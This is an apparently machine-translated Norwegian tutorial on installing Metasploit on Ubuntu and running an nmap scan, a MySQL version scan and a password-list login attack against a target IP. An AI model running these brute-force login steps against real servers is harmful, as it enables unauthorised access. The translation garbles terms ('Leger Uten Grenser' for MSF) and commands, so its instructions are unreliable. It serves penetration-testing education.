Metasploit -rammeverk for å teste serversikkerhet

Innholdsfortegnelse
Metasploit Framework, er en verktøy for å utvikle og kjøre bedrifter mot en datamaskin eller server. Metasploit Framework er skrevet på Ruby -språket, det er multiplattform og krever en kraftig datamaskin for å kjøre, det er en betalt versjon og en gratis versjon for samfunnet.
Den kan lastes ned fra www.metasploit.com/framework/download
Vi skal installere i Linux Ubutnu, men det fungerer for andre distroer ved å endre noen kommandoer.
Vi får tilgang til terminalvinduet og installerer rubin, før det fungerte med perl, men det var programmert helt nytt.
Vi installerer rubinavhengighetene slik at vi kan kjøre rammeverket.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Avhengig av hvilken versjon vi laster ned 32 eller 64 bit fra termink, gir vi tillatelse:
chmod + x metasploit-latest-linux-x64-installer.run

Vi kjører installasjonsprogrammet, og installasjonsvinduet åpnes:
sudo metasploit-latest-linux-x64-installer.run

Vi skal klikke på følgende Fordward), vi definerer om den skal installeres som en tjeneste og porten den skal okkupere, som standard bruker den 3790.
På slutten av installasjonen fra terminalvinduet og med root -tilgang oppdaterer vi rammeverket
med kommandoen:
msfupdate

Metasploit er et program uten et grafisk miljø som kjører helt i terminalen. Vi får tilgang til programvaren fra terminalen med kommandoen:
msfconsole

Å kjenne Leger Uten Grenser internt
Leger Uten Grenser (Metasploit Framework) Den er strukturert i en serie moduler som:

Utnytter Hva er skriptene og programmene som er tilgjengelige i Leger Uten Grenser og som vi kan bruke, de er organisert etter operativsystem og kategorier, for eksempel exploits / windows / browser / som er utnyttelsene tilgjengelig for nettlesere som kjører på Windows.

Nyttelast: Det er handlingen som vil bli utført hvis sårbarheten vi tester kan bli funnet og utnyttet.

Hjelpemiddel: hjelpeskriptene med forskjellige funksjoner, for eksempel auxiliary / scanner / portscan / tcp og bruk av denne tcp -portskanneren, ville vi få portstatusen. Dette skriptet er et alternativ til Nmap.

Undrer: De koder skript for å unngå antivirus og antispammer.

Vi starter et testeksempel fra terminalen vi utfører:
./msfconsole

Metsploit -ledeteksten er msf> derfra vil vi utføre alt, og for å avslutte skriver vi bare exit
Vi starter med å skanne en ip med nmap
msf> nmap -sV 190.155.80.110

Vi aktiverer hjelpemodulen for å få tilgang til skriptverktøyene som gjør det mulig å arbeide med mysql. Vi kan også se versjonen av modulen.

Vi skanner versjonen av mysqlav åpenbare grunner er IP -en fiktiv og bare for eksempel:
 msf> auxiliary (mysql_version)> set RHOSTS 190.155.80.110 // set the remote ip msf> set RHOSTS 192.155.80.110 msf> auxiliary (mysql_version)> run // check mysql version 

Hvis den utføres riktig, kan den returnere mysql -versjonen:
[*] 190.155.80.110 kjører Mysql5.0

En annen sak med skannemodulen og prøver å endre rotbrukeren til mysql:
 msf> bruk skanner / mysql / mysql_login msf> sett BRUKERNAME admin msf> sett PASS_FILE /tmp/keys.lst // tekstfil med mulige taster en under den andre msf> exploit 

Hvis det fungerer kan vi logge på mysql:
mysql -h 1920,155,80,110 -u admin -pkey

Du vil bidra til utvikling av området, dele siden med vennene dine

wave wave wave wave wave